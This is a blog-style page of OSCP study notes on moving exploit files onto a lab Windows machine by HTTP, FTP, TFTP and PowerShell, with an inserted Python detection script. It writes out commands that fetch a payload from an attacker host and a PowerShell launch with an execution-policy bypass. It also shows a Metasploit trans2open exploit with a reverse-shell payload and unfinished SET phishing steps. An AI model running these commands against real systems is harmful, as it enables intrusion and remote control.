• OSCP Security Technology


    OSCP Security Technology - File Transfers(1)

    File Transfers
    • HTTP
    • wget
    • FTP
    • TFTP
    • Powershell
    • Metasploit

    Browse the following link:

    http://192.168.1.14/exploit.php
    


    wget
    wget http://192.168.1.14/exploit.php
    


    FTP

    Install and start an FTP service on Kali Linux.

    sudo apt-get install python3-pyftpdlib
    cd /var/www/html
    python3 -m pyftpdlib -p 21
    


    Get exploit.php on the Windows PC.

    ftp 192.168.1.14
    binary
    get exploit.php
    


    echo open 192.168.1.14 > ftp.txt
    echo anonymous>> ftp.txt
    echo pass>> ftp.txt
    echo binary >> ftp.txt
    echo get exploit.php >> ftp.txt
    echo bye >> ftp.txt
    


    msfconsole
    msfconsole
    use auxiliary/server/ftp
    show options
    exploit
    


    TFTP

    Start the TFTP service on Kali Linux.

    atftpd --daemon --port 69 /var/www/html
    


    Get the file on the Windows PC. The script below uses PowerShell and downloads over HTTP rather than TFTP.

    echo $storage = $pwd > get.ps1
    echo $webclient = New-object System.Net.Webclient >> get.ps1
    echo $url = "http://192.168.1.14/exploit.php" >> get.ps1
    echo $file = "exploit.php" >> get.ps1
    echo $webclient.DownloadFile($url,$file) >> get.ps1
    
    powershell.exe -Execution Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
    


    echo $storage = $pwd > get.ps1&echo $webclient = New-object System.Net.Webclient >> get.ps1&echo $url = "http://192.168.1.14/exploit.php" >> get.ps1&echo $file = "exploit.php" >> get.ps1&echo $webclient.DownloadFile($url,$file) >> get.ps1
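
For detection, the echo-built scripts and the PowerShell launch above leave recognizable command lines in process-creation logs. The following Python sketch is an added example, not part of the original notes; the rule names, hostnames and sample events are constructed, and it assumes each shell command was logged as its own `cmd.exe /c` process.

```python
import re
from collections import defaultdict

# Constructed process-creation records (host, command line), not real telemetry.
# Assumption: each shell command was spawned as its own "cmd.exe /c ..." process.
SAMPLE_EVENTS = [
    ("WS01", r"cmd.exe /c echo open 192.168.1.14 > ftp.txt"),
    ("WS01", r"cmd.exe /c echo $webclient = New-object System.Net.Webclient >> get.ps1"),
    ("WS01", r"powershell.exe -Execution Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1"),
    ("WS02", r"powershell.exe -ExecutionPolicy RemoteSigned -File backup.ps1"),
    ("WS03", r"cmd.exe /c echo build finished > status.txt"),
]

def policy_bypass(cmd):
    """True if powershell is started with the execution policy set to Bypass.

    powershell.exe accepts abbreviated parameter names (the page uses
    -Execution) and the alias -ep, so matching only the literal string
    "-ExecutionPolicy" misses them.
    """
    if not re.search(r"\bpowershell(\.exe)?\b", cmd, re.I):
        return False
    for m in re.finditer(r"(?<!\S)-(\w+)\s+bypass\b", cmd, re.I):
        flag = m.group(1).lower()
        if flag == "ep" or (len(flag) >= 2 and "executionpolicy".startswith(flag)):
            return True
    return False

def _rx(pattern):
    # Wrap a case-insensitive regex as a boolean test on a command line.
    return lambda cmd: re.search(pattern, cmd, re.I) is not None

RULES = [
    ("ps_execution_policy_bypass", policy_bypass),
    ("echo_builds_ps1", _rx(r"\becho\b[^&|]*>{1,2}\s*\S+\.ps1\b")),
    ("echo_builds_ftp_script", _rx(r"\becho\s+open\s+\S+\s*>{1,2}\s*\S+")),
    ("webclient_downloadfile", _rx(r"net\.webclient|\.downloadfile\(")),
]

def match_rules(cmd):
    return [name for name, test in RULES if test(cmd)]

def triage(events, min_rules=2):
    """Group hits per host; report hosts where several distinct rules fired."""
    hits = defaultdict(set)
    for host, cmd in events:
        hits[host].update(match_rules(cmd))
    return {h: sorted(r) for h, r in hits.items() if len(r) >= min_rules}

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

Commands typed into an interactive shell do not create a process per `echo`, so file-creation telemetry for new `.ps1` files is a useful complement to these command-line rules.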
    
    Msfconsole

    Target: Kioptrix Level 1 VM

    msfconsole
    search trans2open
    use exploit/linux/samba/trans2open
    set RHOST 192.168.1.22
    set payload generic/shell_reverse_tcp
    show options
    exploit
    


    Exploiting

    help
    wget http://192.168.1.14/exploit.php
    ls
    pwd
    


    SET

    Target: Win7 VM

    setoolkit
    
    --> 1) Social-Engineering Attacks
    --> 2) Website Attack Vectors
    --> 1) Java Applet Attack Method
    --> 2) Site Cloner
    
    


    Generate payload.


    Browse the site from Windows.


    Error occurred...


    Continue next time...

    Note (pyinjector.binary):

    https://gitlab.com/kalilinux/packages/set/-/blob/d9fd94cbe53940381de66e506a233c33cfb38c8a/src/payloads/set_payloads/pyinjector.binary

  • Original article: https://www.cnblogs.com/keepmoving1113/p/15232011.html